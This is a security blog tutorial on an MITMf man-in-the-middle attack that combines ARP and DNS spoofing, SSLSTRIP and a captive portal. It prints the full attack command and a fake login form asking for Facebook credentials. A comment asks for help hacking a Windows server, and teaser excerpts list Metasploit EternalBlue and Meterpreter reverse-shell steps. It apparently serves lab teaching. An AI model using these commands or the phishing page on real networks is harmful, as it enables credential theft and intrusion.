Using MITMF with SSLSTRIP and Captive Portal options

In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously.
In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option.
Please review the videos listed below, if needed:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers

We saw in the previous videos that websites correctly configured for HSTS, can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured - which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks.
Because it is unlikely for a user to browse ONLY correctly configured HSTS websites; an attacker can redirect the SSLSTRIP vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media credentials, email credentials, etc)

Captive Portal

The test Captive Portal in the video is a very basic one which uses two files under the /var/www/html/form1 directory: index.html and welcome.php

index.html

<form action="welcome.php" method="post">
Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>

welcome.php

<html>
<body>
Enjoy tour browsing!
</body>
</html>

An attacker in a real scenario, would make the Captive Portal webpage fancier and more convincing.

MITMF

MITMF can be installed from the Kali Linux repository; but in order to use the Captive Portal option, MITMF has to be installed from GitHub - from the following location: https://github.com/byt3bl33d3r/MITMf

The following MITMF command was used to initiate the man-in-the-middle attack using ARP spoofing, SSLSTRIP and Captive Portal options:

./mitmf.py -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70 --captive --portalurl http://192.168.254.176/form1

Using MITMF with SSLSTRIP and Captive Portal options




Comments

  1. Unknown31 December 2018 at 05:24

    please help, erro " python mitmf.py
    :0: UserWarning: You do not have a working installation of the service_identity module: 'cannot import name opentype'. Please install it from and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
    Traceback (most recent call last):
    File "mitmf.py", line 36, in
    from plugins import *
    File "/root/programas/MITMf/plugins/filepwn.py", line 72, in
    from libs.bdfactory import pebin
    ImportError: No module named bdfactory "

    ReplyDelete
  2. Unknown31 December 2018 at 14:05

    solved

    ReplyDelete
    Replies
    1. White Hat31 December 2018 at 14:53

      Looks like you didn't install all the prerequisites ... ?

      Delete
    2. Unknown5 February 2019 at 10:08

      How did you solved it? I have the same issue.

      Delete
  3. Mahmoud Mansour14 January 2019 at 23:37

    Thanks Dude <3
    subscribed

    ReplyDelete
  4. Unknown9 May 2019 at 22:12

    Hi, how're doing?... Well I have a problem hacking into a windows server 2012 R2... I'm using eternalblue. Plz show me how to do itπŸ™πŸ™πŸ™πŸ™πŸ™

    ReplyDelete
  5. Unknown21 May 2020 at 02:41

    my mitmf is not showing any captured traffic

    ReplyDelete

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Image
Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp paylo…
Read more

Generating shellcode - using msfvenom to generate a binary payload

Image
In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability.

The article below is an excellent introduction to how a binary payload works:
https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has 2 parts that will be generated independently, then combined into a single file.

The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file.

The second component for our payload, is the part of the code which will create the Meterpreter shell fro…
Read more

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

Image
In the video below we will identify computers affected by the MS17-010 vulnerability, by  using a Metasploit auxiliary scanning module.
Check also my other post on detecting the MS17-010 vulnerability by using NMAP.

MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by WannaCry, Petya and Bad Rabbit Ransomware.
This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer. 
For more information, check the Microsoft Security Bulletin MS17-010:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-au/help/4013389/title

Metasploit commands used in this video:
search name:ms17_010 
This command lists the Metasploit modules containing the string "ms17_010" in the name. 
Can also simply use: search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
This command selects the module "auxiliary/scanner/smb/smb_ms17_010".
show opti…
Read more